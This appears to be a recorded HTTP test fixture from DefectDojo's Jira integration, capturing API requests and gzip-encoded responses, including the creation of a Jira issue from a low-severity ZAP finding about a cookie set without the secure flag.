zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - e359c64f9d6e847d + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:09 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a019f09b-78d1-4194-b032-d898f59c0702 + x-envoy-upstream-service-time: + - '92' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap2: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap2: Cookie Without Secure + Flag|http://localhost:8080/finding/388]\n\n*Defect Dojo link:* http://localhost:8080/finding/388\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/112]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 388\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10613","key":"NTEST-461","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10613"}' + headers: + ATL-TraceId: + - 87a8b32760854780 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:10 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 30d5b1e4-f52e-4fb3-a437-510b3f7bdad2 + x-envoy-upstream-service-time: + - '465' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-461 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - ef3140568373ad21 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:10 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - ad5e7ccc-527c-4a1f-849f-d6b13abb15f5 + x-envoy-upstream-service-time: + - '147' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10613 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - c93500b816695eaf + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:10 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d2e190ef-7877-4004-b113-6c80c5f17830 + x-envoy-upstream-service-time: + - '177' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1JmnS3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAF5s799bR5e2ut2v05d + nIh8S1AGGbxnZMDZuOOENrTHGeOBO+PWIYa6dTTDb4TIFBD8Yt6rkEAGjObAcla1lEq2lSUvAOAG + IhzzHpfY247TlS1zoC0DyYWkiS3/2H56tNpFkFdCbDXVGpHv6lornjQqumWV2LEomOjrqv5XEExq + eBoXRdI7Wq0mPLteJftEzGUiaD8ODTmffwAAAP//AwDx1msmWgEAAA== + headers: + ATL-TraceId: + - 0d456eb251566fc2 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:14 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - ea7a622b-51e7-40e1-9558-15d24ee18935 + x-envoy-upstream-service-time: + - '30' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 725f823c9025c5c5 + Connection: + - 